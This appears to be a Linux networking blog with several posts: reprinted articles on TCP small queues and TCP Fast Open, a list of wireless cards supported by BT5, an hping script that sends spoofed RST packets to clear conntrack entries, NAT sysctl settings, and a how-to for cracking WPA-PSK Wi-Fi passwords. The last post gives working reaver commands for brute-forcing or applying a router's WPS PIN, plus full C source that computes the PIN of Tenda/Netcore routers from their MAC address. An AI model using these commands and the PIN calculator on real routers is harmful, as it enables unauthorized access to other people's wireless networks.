Monday, October 29, 2012

TCP small queues


TCP small queues is another mechanism for fighting network congestion. Its goal is to reduce the number of TCP packets sitting in the xmit queues (qdisc & device queues), and thereby reduce RTT and cwnd bias, addressing part of the bufferbloat problem. The per-bulk-sender buffering can be reduced without lowering nominal bandwidth: < 1 ms at 1 Gbit (versus 50 ms with TSO) and < 8 ms at 100 Mbit (versus 132 ms).

By Jonathan Corbet
July 17, 2012
The "bufferbloat" problem is the result of excessive buffering in the network stack; it leads to long latencies and poor reliability in the network as a whole. Fixing it is a matter of buffering less data in each system between any two endpoints—a task that sounds simple, but proves to be more challenging than one might expect. It turns out that buffering can show up in many surprising places in the networking stack; tracking all of these places down and fixing them is not always easy.A number of bloat-fighting changes have gone into the kernel over the last year. The CoDel queue management algorithm works to prevent packets from building up in router queues over time. At a much lower level, byte queue limits put a cap on the amount of data that can be waiting to go out a specific network interface. Byte queue limits work only at the device queue level, though, while the networking stack has other places—such as the queueing discipline level—where buffering can happen. So there would be value in an implementation that could limit buffering at levels above the device queue.
Eric Dumazet's TCP small queues patch looks like it should be able to fill at least part of that gap. It limits the amount of data that can be queued for transmission by any given socket regardless of where the data is queued, so it shouldn't be fooled by buffers lurking in the queueing, traffic control, or netfilter code. That limit is set by a new sysctl knob found at:

    /proc/sys/net/ipv4/tcp_limit_output_bytes
The default value of this limit is 128KB; it could be set lower on systems where latency is the primary concern.
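For example, a latency-sensitive host could lower the limit programmatically; a minimal sketch, with the 64KB value chosen purely for illustration:

    // Sketch: lower tcp_limit_output_bytes; the 64KB value is illustrative only.
    #include <stdio.h>

    int main(void)
    {
        FILE *f = fopen("/proc/sys/net/ipv4/tcp_limit_output_bytes", "w");
        if (f == NULL) {
            perror("fopen");
            return 1;
        }
        fprintf(f, "%d\n", 64 * 1024);   // 64KB instead of the 128KB default
        fclose(f);
        return 0;
    }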
The networking stack already tracks the amount of data waiting to be transmitted through any given socket; that value lives in the sk_wmem_alloc field of struct sock. So applying a limit is relatively easy; tcp_write_xmit() need only look to see if sk_wmem_alloc is above the limit. If that is the case, the socket is marked as being throttled and no more packets are queued.
The harder part is figuring out when some space opens up and it is possible to add more packets to the queue. The time when queue space becomes free is when a queued packet is freed. So Eric's patch overrides the normal struct sk_buff destructor when an output limit is in effect; the new destructor can check to see whether it is time to queue more data for the relevant socket. The only problem is that this destructor can be called from deep within the network stack with important locks already held, so it cannot queue new data directly. So Eric had to add a new tasklet to do the actual job of queuing new packets.
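The control flow is easier to see in a userspace caricature of the mechanism; every name below is invented for illustration, and the real kernel code operates on struct sock and sk_buff and defers the refill to a tasklet rather than calling it directly:

    // Userspace caricature of TCP small queues: a sender is throttled while
    // too many bytes sit in the transmit path, and freeing a "packet"
    // triggers the deferred refill that the kernel does from a tasklet.
    // All names here are invented for illustration.
    #include <stdbool.h>
    #include <stdio.h>

    #define LIMIT_OUTPUT_BYTES (128 * 1024)   // default tcp_limit_output_bytes
    #define PKT_SIZE 1500

    struct fake_sock {
        unsigned int wmem_alloc;   // stands in for sk->sk_wmem_alloc
        bool throttled;
    };

    // Queue packets until the in-flight byte count hits the limit
    // (the check that tcp_write_xmit() performs).
    static void write_xmit(struct fake_sock *sk)
    {
        while (sk->wmem_alloc + PKT_SIZE <= LIMIT_OUTPUT_BYTES)
            sk->wmem_alloc += PKT_SIZE;
        sk->throttled = true;      // no more packets until space frees up
    }

    // Stand-in for the overridden sk_buff destructor: freeing a packet
    // un-throttles the socket so more data can be queued. The kernel
    // defers the requeue to a tasklet because locks are held here.
    static void free_packet(struct fake_sock *sk)
    {
        sk->wmem_alloc -= PKT_SIZE;
        if (sk->throttled && sk->wmem_alloc < LIMIT_OUTPUT_BYTES) {
            sk->throttled = false;
            write_xmit(sk);        // deferred work: queue more packets
        }
    }

    int main(void)
    {
        struct fake_sock sk = { 0, false };
        write_xmit(&sk);
        printf("queued %u bytes, throttled=%d\n", sk.wmem_alloc, sk.throttled);
        free_packet(&sk);          // the NIC "completes" one packet
        printf("after free: %u bytes queued\n", sk.wmem_alloc);
        return 0;
    }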
It seems that the patch is having the intended result:

Results on my dev machine (tg3 nic) are really impressive, using standard pfifo_fast, and with or without TSO/GSO. Without reduction of nominal bandwidth. I no longer have 3MBytes backlogged in qdisc by a single netperf session, and both side socket autotuning no longer use 4 Mbytes.
He also ran some tests over a 10Gb link and was able to get full wire speed, even with a relatively small output limit.
There are some outstanding questions, still. For example, Tom Herbert asked about how this mechanism interacts with more complex queuing disciplines; that question will take more time and experimentation to answer. Tom also suggested that the limit could be made dynamic and tied to the lower-level byte queue limits. Still, the patch seems like an obvious win, so it has already been pulled into the net-next tree for the 3.6 kernel. The details can be worked out later, and the feature can always be turned off by default if problems emerge during the 3.6 development cycle.

TCP Fast Open: expediting web services

"Fast Open" is an optimization for TCP connection establishment that saves one RTT (round-trip time) relative to an ordinary TCP session, speeding up access to popular web sites by 4%-41%. This kernel release, however, includes only the client-side TFO support.

By Michael Kerrisk
August 1, 2012
Much of today's Internet traffic takes the form of short TCP data flows that consist of just a few round trips exchanging data segments before the connection is terminated. The prototypical example of this kind of short TCP conversation is the transfer of web pages over the Hypertext Transfer Protocol (HTTP).
The speed of TCP data flows is dependent on two factors: transmission delay (the width of the data pipe) and propagation delay (the time that the data takes to travel from one end of the pipe to the other). Transmission delay is dependent on network bandwidth, which has increased steadily and substantially over the life of the Internet. On the other hand, propagation delay is a function of router latencies, which have not improved to the same extent as network bandwidth, and the speed of light, which has remained stubbornly constant. (At intercontinental distances, this physical limitation means that—leaving aside router latencies—transmission through the medium alone requires several milliseconds.) The relative change in the weighting of these two factors means that over time the propagation delay has become a steadily larger component in the overall latency of web services. (This is especially so for many web pages, where a browser often opens several connections to fetch multiple small objects that compose the page.)
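As a rough sanity check on that claim (my arithmetic, not the article's): signals in optical fiber propagate at roughly two thirds of the speed of light, about 2×10^8 m/s, so each 1000 km of path adds about 5 ms of one-way delay:

    t_{prop} = \frac{d}{v} \approx \frac{10^{6}\,\mathrm{m}}{2\times10^{8}\,\mathrm{m/s}} = 5\,\mathrm{ms} \quad \text{per 1000 km, one way}

So even before router latencies, an intercontinental path costs several milliseconds each way, and no increase in bandwidth can reduce that.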
Reducing the number of round trips required in a TCP conversation has thus become a subject of keen interest for companies that provide web services. It is therefore unsurprising that Google should be the originator of a series of patches to the Linux networking stack to implement the TCP Fast Open (TFO) feature, which allows the elimination of one round-trip time (RTT) from certain kinds of TCP conversations. According to the implementers (in "TCP Fast Open", CoNEXT 2011 [PDF]), TFO could result in speed improvements of between 4% and 41% in the page load times on popular web sites.
We first wrote about TFO back in September 2011, when the idea was still in the development stage. Now that the TFO implementation is starting to make its way into the kernel, it's time to visit it in more detail.

The TCP three-way handshake

To understand the optimization performed by TFO, we first need to note that each TCP conversation begins with a round trip in the form of the so-called three-way handshake. The three-way handshake is initiated when a client makes a connection request to a server. At the application level, this corresponds to a client performing a connect() system call to establish a connection with a server that has previously bound a socket to a well-known address and then called accept() to receive incoming connections. Figure 1 shows the details of the three-way handshake in diagrammatic form.

[TCP Three-Way Handshake]
Figure 1: TCP three-way handshake between a client and a server

During the three-way handshake, the two TCP end-points exchange SYN (synchronize) segments containing options that govern the subsequent TCP conversation—for example, the maximum segment size (MSS), which specifies the maximum number of data bytes that a TCP end-point can receive in a TCP segment. The SYN segments also contain the initial sequence numbers (ISNs) that each end-point selects for the conversation (labeled M and N in Figure 1).
The three-way handshake serves another purpose with respect to connection establishment: in the (unlikely) event that the initial SYN is duplicated (this may occur, for example, because underlying network protocols duplicate network packets), then the three-way handshake allows the duplication to be detected, so that only a single connection is created. If a connection was established before completion of the three-way handshake, then a duplicate SYN could cause a second connection to be created.
The problem with current TCP implementations is that data can only be exchanged on the connection after the initiator of the connection has received an ACK (acknowledge) segment from the peer TCP. In other words, data can be sent from the client to the server only in the third step of the three-way handshake (the ACK segment sent by the initiator). Thus, one full round trip time is lost before data is even exchanged between the peers. This lost RTT is a significant component of the latency of short web conversations.
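In socket API terms, that lost round trip is hidden inside connect(): a blocking connect() returns only once the SYN and SYN-ACK have been exchanged, and only then can the client send its request. A minimal sketch of the conventional client side, with address, port, and request as placeholders:

    // Conventional TCP client: connect() performs the three-way handshake
    // before any data can be sent. Address, port, and request are placeholders.
    #include <arpa/inet.h>
    #include <string.h>
    #include <sys/socket.h>
    #include <unistd.h>

    int main(void)
    {
        int sfd = socket(AF_INET, SOCK_STREAM, 0);

        struct sockaddr_in addr;
        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(80);                        // placeholder port
        inet_pton(AF_INET, "192.0.2.1", &addr.sin_addr);  // placeholder address

        // Blocks for one full round trip: SYN out, SYN-ACK back, ACK out.
        connect(sfd, (struct sockaddr *) &addr, sizeof(addr));

        // Only now can data flow.
        write(sfd, "GET / HTTP/1.0\r\n\r\n", 18);

        close(sfd);
        return 0;
    }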
Applications such as web browsers try to mitigate this problem using HTTP persistent connections, whereby the browser holds a connection open to the web server and reuses that connection for later HTTP requests. However, the effectiveness of this technique is decreased because idle connections may be closed before they are reused. For example, in order to limit resource usage, busy web servers often aggressively close idle HTTP connections. The result is that a high proportion of HTTP requests are cold, requiring a new TCP connection to be established to the web server.

Eliminating a round trip

Theoretically, the initial SYN segment could contain data sent by the initiator of the connection: RFC 793, the specification for TCP, does permit data to be included in a SYN segment. However, TCP is prohibited from delivering that data to the application until the three-way handshake completes. This is a necessary security measure to prevent various kinds of malicious attacks. For example, if a malicious client sent a SYN segment containing data and a spoofed source address, and the server TCP passed that segment to the server application before completion of the three-way handshake, then the segment would both cause resources to be consumed on the server and cause (possibly multiple) responses to be sent to the victim host whose address was spoofed.
The aim of TFO is to eliminate one round trip time from a TCP conversation by allowing data to be included as part of the SYN segment that initiates the connection. TFO is designed to do this in such a way that the security concerns described above are addressed. (T/TCP, a mechanism designed in the early 1990s, also tried to provide a way of short circuiting the three-way handshake, but fundamental security flaws in its design meant that it never gained wide use.)
On the other hand, the TFO mechanism does not detect duplicate SYN segments. (This was a deliberate choice made to simplify design of the protocol.) Consequently, servers employing TFO must be idempotent—they must tolerate the possibility of receiving duplicate initial SYN segments containing the same data and produce the same result regardless of whether one or multiple such SYN segments arrive. Many web services are idempotent, for example, web servers that serve static web pages in response to URL requests from browsers, or web services that manipulate internal state but have internal application logic to detect (and ignore) duplicate requests from the same client.
In order to prevent the aforementioned malicious attacks, TFO employs security cookies (TFO cookies). The TFO cookie is generated once by the server TCP and returned to the client TCP for later reuse. The cookie is constructed by encrypting the client IP address in a fashion that is reproducible (by the server TCP) but is difficult for an attacker to guess. Request, generation, and exchange of the TFO cookie happens entirely transparently to the application layer.
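The shape of that idea can be shown with a deliberately simplified toy. This is not the real algorithm and is not cryptographically secure; it merely illustrates "keyed, reproducible, hard to guess". A real implementation would use a proper block cipher keyed with a periodically rotated server secret:

    // Toy illustration of a TFO-style cookie: a keyed, reproducible
    // transform of the client IP. NOT cryptographically secure and NOT
    // the real algorithm; real implementations use a block cipher keyed
    // with a server secret.
    #include <stdint.h>
    #include <stdio.h>

    static uint64_t toy_cookie(uint32_t client_ip, uint64_t server_key)
    {
        uint64_t x = client_ip ^ server_key;
        // A few rounds of mixing so the output looks unrelated to the input.
        for (int i = 0; i < 4; i++) {
            x ^= x >> 33;
            x *= 0xff51afd7ed558ccdULL;   // mixing constant from MurmurHash3
        }
        return x;
    }

    int main(void)
    {
        uint32_t client_ip = 0xC0000201;        // 192.0.2.1
        uint64_t key = 0x0123456789abcdefULL;   // server secret (placeholder)

        // The server generates the cookie once...
        uint64_t cookie = toy_cookie(client_ip, key);
        printf("cookie: %016llx\n", (unsigned long long) cookie);

        // ...and later validates a presented cookie by recomputing it.
        printf("valid: %d\n", cookie == toy_cookie(client_ip, key));
        return 0;
    }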
At the protocol layer, the client requests a TFO cookie by sending a SYN segment to the server that includes a special TCP option asking for a TFO cookie. The SYN segment is otherwise "normal"; that is, there is no data in the segment and establishment of the connection still requires the normal three-way handshake. In response, the server generates a TFO cookie that is returned in the SYN-ACK segment that the server sends to the client. The client caches the TFO cookie for later use. The steps in the generation and caching of the TFO cookie are shown in Figure 2.

[Generating the TFO cookie]
Figure 2: Generating the TFO cookie

At this point, the client TCP now has a token that it can use to prove to the server TCP that an earlier three-way handshake to the client's IP address completed successfully.
For subsequent conversations with the server, the client can short circuit the three-way handshake as shown in Figure 3.

[Employing the TFO cookie]
Figure 3: Employing the TFO cookie

The steps shown in Figure 3 are as follows:

  1. The client TCP sends a SYN that contains both the TFO cookie (specified as a TCP option) and data from the client application.
  2. The server TCP validates the TFO cookie by duplicating the encryption process based on the source IP address of the new SYN. If the cookie proves to be valid, then the server TCP can be confident that this SYN comes from the address it claims to come from. This means that the server TCP can immediately pass the application data to the server application.
  3. From here on, the TCP conversation proceeds as normal: the server TCP sends a SYN-ACK segment to the client, which the client TCP then acknowledges, thus completing the three-way handshake. The server TCP can also send response data segments to the client TCP before it receives the client's ACK.
In the above steps, if the TFO cookie proves not to be valid, then the server TCP discards the data and sends a segment to the client TCP that acknowledges just the SYN. At this point, the TCP conversation falls back to the normal three-way handshake. If the client TCP is authentic (not malicious), then it will (transparently to the application) retransmit the data that it sent in the SYN segment.
Comparing Figure 1 and Figure 3, we can see that a complete RTT has been saved in the conversation between the client and server. (This assumes that the client's initial request is small enough to fit inside a single TCP segment. This is true for most requests, but not all. Whether it might be technically possible to handle larger requests—for example, by transmitting multiple segments from the client before receiving the server's ACK—remains an open question.)
There are various details of TFO cookie generation that we don't cover here. For example, the algorithm for generating a suitably secure TFO cookie is implementation-dependent, and should (and can) be designed to be computable with low processor effort, so as not to slow the processing of connection requests. Furthermore, the server should periodically change the encryption key used to generate the TFO cookies, so as to prevent attackers harvesting many cookies over time to use in a coordinated attack against the server.
There is one detail of the use of TFO cookies that we will revisit below. Because the TFO mechanism allows a client that submits a valid TFO cookie to trigger resource usage on the server before completion of the three-way handshake, the server can be the target of resource-exhaustion attacks. To prevent this possibility, the server imposes a limit on the number of pending TFO connections that have not yet completed the three-way handshake. When this limit is exceeded, the server ignores TFO cookies and falls back to the normal three-way handshake for subsequent client requests until the number of pending TFO connections falls below the limit; this allows the server to employ traditional measures against SYN-flood attacks.

The user-space API

As noted above, the generation and use of TFO cookies is transparent to the application level: the TFO cookie is automatically generated during the first TCP conversation between the client and server, and then automatically reused in subsequent conversations. Nevertheless, applications that wish to use TFO must notify the system using suitable API calls. Furthermore, certain system configuration knobs need to be turned in order to enable TFO.
The changes required to a server in order to support TFO are minimal, and are highlighted in the code template below.
    sfd = socket(AF_INET, SOCK_STREAM, 0);   // Create socket

    bind(sfd, ...);                          // Bind to well known address
    
    int qlen = 5;                            // Value to be chosen by application
    setsockopt(sfd, SOL_TCP, TCP_FASTOPEN, &qlen, sizeof(qlen));
    
    listen(sfd, ...);                        // Mark socket to receive connections

    cfd = accept(sfd, NULL, 0);              // Accept connection on new socket

    // read and write data on connected socket cfd

    close(cfd);
Setting the TCP_FASTOPEN socket option requests the kernel to use TFO for the server's socket. By implication, this is also a statement that the server can handle duplicated SYN segments in an idempotent fashion. The option value, qlen, specifies this server's limit on the size of the queue of TFO requests that have not yet completed the three-way handshake (see the remarks on prevention of resource-exhaustion attacks above).
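For reference, here is a fleshed-out version of the template that should compile as-is; the port, backlog, and qlen values are placeholders of my choosing, error handling is omitted for brevity, and TCP_FASTOPEN requires kernel headers recent enough to define it (and, per the article, server-side support was not yet merged at the time of writing):

    // Compilable sketch of the server template above; port, backlog,
    // and qlen are arbitrary placeholders.
    #include <netinet/in.h>
    #include <netinet/tcp.h>   // TCP_FASTOPEN, SOL_TCP
    #include <string.h>
    #include <sys/socket.h>
    #include <unistd.h>

    int main(void)
    {
        int sfd = socket(AF_INET, SOCK_STREAM, 0);

        struct sockaddr_in addr;
        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_addr.s_addr = htonl(INADDR_ANY);
        addr.sin_port = htons(8080);            // placeholder port

        bind(sfd, (struct sockaddr *) &addr, sizeof(addr));

        int qlen = 5;                           // pending-TFO queue limit
        setsockopt(sfd, SOL_TCP, TCP_FASTOPEN, &qlen, sizeof(qlen));

        listen(sfd, 10);

        int cfd = accept(sfd, NULL, NULL);

        // read and write data on connected socket cfd ...

        close(cfd);
        close(sfd);
        return 0;
    }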
The changes required to a client in order to support TFO are also minor, but a little more substantial than for a TFO server. A normal TCP client uses separate system calls to initiate a connection and transmit data: connect() to initiate the connection to a specified server address and (typically) write() or send() to transmit data. Since a TFO client combines connection initiation and data transmission in a single step, it needs to employ an API that allows both the server address and the data to be specified in a single operation. For this purpose, the client can use either of two repurposed system calls: sendto() and sendmsg().
The sendto() and sendmsg() system calls are normally used with datagram (e.g., UDP) sockets: since datagram sockets are connectionless, each outgoing datagram must include both the transmitted data and the destination address. Since this is the same information that is required to initiate a TFO connection, these system calls are recycled for the purpose, with the requirement that the new MSG_FASTOPEN flag must be specified in the flags argument of the system call. A TFO client thus has the following general form:
    sfd = socket(AF_INET, SOCK_STREAM, 0);
    
    sendto(sfd, data, data_len, MSG_FASTOPEN, 
                (struct sockaddr *) &server_addr, addr_len);
        // Replaces connect() + send()/write()
    
    // read and write further data on connected socket sfd

    close(sfd);
If this is the first TCP conversation between the client and server, then the above code will result in the scenario shown in Figure 2, with the result that a TFO cookie is returned to the client TCP, which then caches the cookie. If the client TCP has already obtained a TFO cookie from a previous TCP conversation, then the scenario is as shown in Figure 3, with client data being passed in the initial SYN segment and a round trip being saved.
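Again for reference, a compilable sketch of the client side; the server address, port, and request are placeholders, and MSG_FASTOPEN may need to be defined by hand if the libc headers predate the feature:

    // Compilable sketch of the client template above; address, port,
    // and request are placeholders.
    #include <arpa/inet.h>
    #include <string.h>
    #include <sys/socket.h>
    #include <unistd.h>

    #ifndef MSG_FASTOPEN
    #define MSG_FASTOPEN 0x20000000
    #endif

    int main(void)
    {
        int sfd = socket(AF_INET, SOCK_STREAM, 0);

        struct sockaddr_in server_addr;
        memset(&server_addr, 0, sizeof(server_addr));
        server_addr.sin_family = AF_INET;
        server_addr.sin_port = htons(8080);                     // placeholder
        inet_pton(AF_INET, "192.0.2.1", &server_addr.sin_addr); // placeholder

        const char *data = "GET / HTTP/1.0\r\n\r\n";            // placeholder request

        // Connection initiation and the first data segment in one call.
        sendto(sfd, data, strlen(data), MSG_FASTOPEN,
               (struct sockaddr *) &server_addr, sizeof(server_addr));

        // read and write further data on connected socket sfd ...

        close(sfd);
        return 0;
    }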
In addition to the above APIs, there are various knobs—in the form of files in the /proc/sys/net/ipv4 directory—that control TFO on a system-wide basis:

  • The tcp_fastopen file can be used to view or set a value that enables the operation of different parts of the TFO functionality. Setting bit 0 (i.e., the value 1) in this value enables client TFO functionality, so that applications can request TFO cookies. Setting bit 1 (i.e., the value 2) enables server TFO functionality, so that server TCPs can generate TFO cookies in response to requests from clients. (Thus, the value 3 would enable both client and server TFO functionality on the host; a sketch of setting this appears after the list.)
  • The tcp_fastopen_cookies file can be used to view or set a system-wide limit on the number of pending TFO connections that have not yet completed the three-way handshake. While this limit is exceeded, all incoming TFO connection attempts fall back to the normal three-way handshake.
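Enabling the feature is the usual write to a /proc file; a minimal sketch that turns on both client and server support (value 3), along the lines of the earlier example:

    // Sketch: enable both client (bit 0) and server (bit 1) TFO, i.e. value 3.
    #include <stdio.h>

    int main(void)
    {
        FILE *f = fopen("/proc/sys/net/ipv4/tcp_fastopen", "w");
        if (f == NULL) {
            perror("fopen");
            return 1;
        }
        fputs("3\n", f);
        fclose(f);
        return 0;
    }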

Current state of TCP fast open

Currently, TFO is an Internet Draft with the IETF. Linux is the first operating system that is adding support for TFO. However, as yet that support remains incomplete in the mainline kernel. The client-side support has been merged for Linux 3.6. However, the server-side TFO support has not so far been merged, and from conversations with the developers it appears that this support won't be added in the current merge window. Thus, an operational TFO implementation is likely to become available only in Linux 3.7.
Once operating system support is fully available, a few further steps need to be completed to achieve wider deployment of TFO on the Internet. Among these is assignment by IANA of a dedicated TCP Option Number for TFO. (The current implementation employs the TCP Experimental Option Number facility as a placeholder for a real TCP Option Number.)
Then, of course, suitable changes must be made to both clients and servers along the lines described above. Although each client-server pair requires modification to employ TFO, it's worth noting that changes to just a small subset of applications—most notably, web servers and browsers—will likely yield most of the benefit visible to end users. During the deployment process, TFO-enabled clients may attempt connections with servers that don't understand TFO. This case is handled gracefully by the protocol: transparently to the application, the client and server will fall back to a normal three-way handshake.
There are other deployment hurdles that may be encountered. In their CoNEXT 2011 paper, the TFO developers note that a minority of middle-boxes and hosts drop TCP SYN segments containing unknown (i.e., new) TCP options or data. Such problems are likely to diminish as TFO is more widely deployed, but in the meantime a client TCP can (transparently) handle such problems by falling back to the normal three-way handshake on individual connections, or generally falling back for all connections to specific server IP addresses that show repeated failures for TFO.

Conclusion

TFO is promising technology that has the potential to make significant reductions in the latency of billions of web service transactions that take place each day. Barring any unforeseen security flaws (and the developers seem to have considered the matter quite carefully), TFO is likely to see rapid deployment in web browsers and servers, as well as in a number of other commonly used web applications.

Friday, October 5, 2012

BT5 supported wireless card list


Wireless cards that have passed testing

  • AWUS036H (rtl8187, r8187) – both mac80211 and IEEE drivers – tested OK
  • AWUS036NH (Ralink RT2870/3070) – using the mac80211 rt2x00usb drivers – tested OK
  • BCM4312 802.11b/g LP-PHY (rev 01) – using the mac80211 b43 driver, works well – tested OK
  • Rockland N3 – (Ralink RT2870/3070) – using the mac80211 rt2x00usb drivers – tested OK
  • Edimax EW-7318USG USB – (Ralink RT2501/RT2573) – using the mac80211 rt2500usb/rt73usb drivers – tested OK
  • ASUSTek Computer, Inc. RT2573 – using the mac80211 rt2500usb/rt73usb drivers – tested OK
  • Linksys WUSB54GC ver 3 – using the mac80211 rt2800usb drivers – tested OK
  • Ubiquiti SRC – using the mac80211 ath9k drivers – tested OK
  • Internal Intel Corporation PRO/Wireless 3945ABG – using the mac80211 iwl3945 drivers – tested OK
  • Dlink WNA-2330 PCMCIA – using the mac80211 ath5k drivers – tested OK
  • Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) – using the mac80211 ath9k drivers – tested OK
  • Netgear wg111v2 – using the mac80211 rtl8187 drivers – tested OK
  • ZyXEL AG-225H v2 – using the mac80211 zd1211 drivers – tested OK
  • Intel 4965/5xxx – using the iwlagn drivers – tested OK

Thursday, October 4, 2012

Using hping to clear ESTABLISHED conntrack entries


Filter the ip_conntrack table for source IPs with too many ESTABLISHED entries, then use hping to clear those IPs' entries from the table...

  

  Installation: ./configure; make; make install

  hping script for clearing IP conntrack entries (the script forces the tracked connections into the CLOSED state):


    #!/bin/sh
    # Usage: ./clear_established.sh <source-ip>
    # For each ESTABLISHED conntrack entry whose src matches $1, send one
    # spoofed RST with hping2 so the tracked connection is torn down.
    if [ -z "$1" ] ; then
            echo "NO INPUT IP"
            exit 1
    fi
    grep -E "^tcp .{10,25}ESTABLISHED src=$1 " /proc/net/ip_conntrack | while read line; do
            S_IP=`echo $line | awk '{print substr($5,5)}'`      # strip the "src=" prefix
            S_SOCK=`echo $line | awk '{print substr($7,7)}'`    # strip "sport="
            D_IP=`echo $line | awk '{print substr($6,5)}'`      # strip "dst="
            D_SOCK=`echo $line | awk '{print substr($8,7)}'`    # strip "dport="
            echo "$S_IP:$S_SOCK $D_IP:$D_SOCK"
            # -a spoofs the source address, -s/-p set source/destination ports,
            # -k keeps the source port fixed, -c 1 sends a single packet.
            hping2 $D_IP -R -s $S_SOCK -p $D_SOCK -a $S_IP -k -c 1 > /home/huaying/1.log 2>&1 &
    done




In practice it's still faster to just use the conntrack tool to flush the table (for example, conntrack -F flushes everything, and conntrack -D -s <ip> deletes the entries for a single source IP) @_@"

Linux NAT tuning settings


  #echo "1024 65000" > /proc/sys/net/ipv4/ip_local_port_range
  #echo "100 1200 128 512 15 5000 500 1884 2">/proc/sys/vm/bdflush
  #echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
  #echo "1" > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
  #echo "1048576" > /proc/sys/net/ipv4/netfilter/ip_conntrack_max
  #echo "1" > /proc/sys/net/ipv4/ip_forward
  #echo "268435456" >/proc/sys/kernel/shmall
  #echo "536870912" >/proc/sys/kernel/shmmax
  #echo "600" > /proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_timeout_established
  #echo "1024" > /proc/sys/net/ipv4/neigh/default/gc_thresh1
  #echo "2048" > /proc/sys/net/ipv4/neigh/default/gc_thresh2
  #echo "4096" > /proc/sys/net/ipv4/neigh/default/gc_thresh3
  #echo "52428800" > /proc/sys/net/ipv4/route/max_size
  #echo "1" > /proc/sys/net/ipv4/conf/all/proxy_arp
  #echo "1" > /proc/sys/net/ipv4/tcp_window_scaling 

Wednesday, October 3, 2012

Instantly cracking WPA-PSK passwords with Reaver and the router's PIN


Previously, the only WPA-PSK cracking method I had was to capture a handshake with the aircrack-ng suite and then run a dictionary attack against it, so whether the password could be recovered depended entirely on the strength of the dictionary. There is a more effective approach: obtain the router's PIN and then use the Reaver tool shipped with BT5 to crack the WPA-PSK password in seconds!
If the PIN is already known, you can run reaver -i mon0 -b <AP's MAC> -p <PIN> under BT5 to crack it immediately!
The harder problem now is obtaining the PIN. Those who follow wireless security will know that current Tenda and Netcore products have a flawed PIN-generation algorithm: if the router's MAC address begins with "C83A35" or "00B00C", the PIN can be computed directly, and then used either to connect right away or, together with Reaver, to recover the WPA-PSK key.
Beyond that, the structure of the PIN makes brute forcing with Reaver practical as well: the PIN is an 8-digit number whose first four digits are verified independently, and of the last four digits only three vary freely because the final digit is a checksum. This cuts the search space to at most 10^4 + 10^3 = 11,000 attempts instead of 10^8, greatly reducing the time required.
Under BT5 you can run reaver -i mon0 -b <AP's MAC> -vv to brute-force the PIN. The process can take many hours; reports online mention 3-10 hours, though I have not verified this myself. Reaver saves its progress to a file (/usr/local/etc/reaver/<AP's MAC>.wpc) along the way.
One restriction on the PIN method of cracking WPA-PSK: the AP must have QSS/WPS enabled. You can tell whether a target AP has it enabled while scanning: with airodump-ng, an AP that shows a "." after the value in the MB column has QSS/WPS turned on.
Alternatively, under Windows 7, if the password prompt when connecting to the AP shows the text "You can also connect by pushing the button on the router", QSS/WPS is enabled as well.

Source code for the PIN calculator for routers whose MAC begins with "C83A35" or "00B00C"; you can compile it yourself:
// Computes the WPS PIN for devices whose MAC address starts with OUI "C83A35" or "00B00C"
// Both OUIs belong to Tenda Technology Co., Ltd and are confirmed to work.
// Coded by Zhaochunsheng - iBeini.com
// Modified by Lingxi - WiFiBETA.COM


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    unsigned int wps_pin_checksum(unsigned int pin);
    int PIN = 0;

    // printf("ComputePIN-C83A35\n");
    printf("Description:\n");
    printf("If your wireless router MAC address starts with \"C83A35\" or \"00B00C\",\n");
    printf("type the other six digits, you might be able to get the\n");
    printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");
    printf("Code by ZhaoChunsheng 04/07/2012 http://iBeini.com\n\n");
    printf("Modified by Lingxi - WiFiBETA.COM\n\n");

    // The same description in Chinese
    printf("说明:\n");
    printf("如果您的无线路由器MAC地址以“C83A35”或“00B00C”打头,\n");
    printf("输入后六位MAC地址(不分大小写)您或许可以获得该路由的WPS PIN密钥!\n");
    printf("祝你好运!\n\n");
    printf("由赵春生编写于2012年4月7日  Http://iBeini.com\n");
    printf("由灵曦修改并汉化  WiFiBETA.COM\n\n");

    printf("请输入后六位MAC地址(HEX):\n");
    printf("Input the last 6 digits of MAC Address(HEX):");
    scanf("%x", &PIN);

    printf("您输入的后六位MAC地址是 %X\n", PIN);
    printf("Last 6 digits of MAC Address(HEX) are: %X\n", PIN);

    // The PIN's first seven digits are the low 24 bits of the MAC taken
    // modulo 10^7; the eighth digit is the WPS checksum.
    printf("WPS PIN is: %07d%d\n", PIN % 10000000, wps_pin_checksum(PIN % 10000000));

    return 0;
}
 
unsigned int wps_pin_checksum(unsigned int pin)
{
    // WPS checksum: weights the seven PIN digits 3,1,3,1,... starting
    // from the rightmost digit and returns the digit that makes the
    // total a multiple of 10. E.g., for 1234567 the weighted sum is 60,
    // so the checksum digit is 0 and the full PIN is 12345670.
    unsigned int accum = 0;

    while (pin)
    {
        accum += 3 * (pin % 10);
        pin /= 10;
        accum += pin % 10;
        pin /= 10;
    }

    return (10 - accum % 10) % 10;
}


  printf("您输入的后六位MAC地址是 %X\n",PIN);
  printf("Last 6 digits of MAC Address(HEX) are: %X\n",PIN);


OUI search (look up the vendor for a MAC prefix)

Example: http://standards.ieee.org/cgi-bin/ouisearch?14-d6-4d
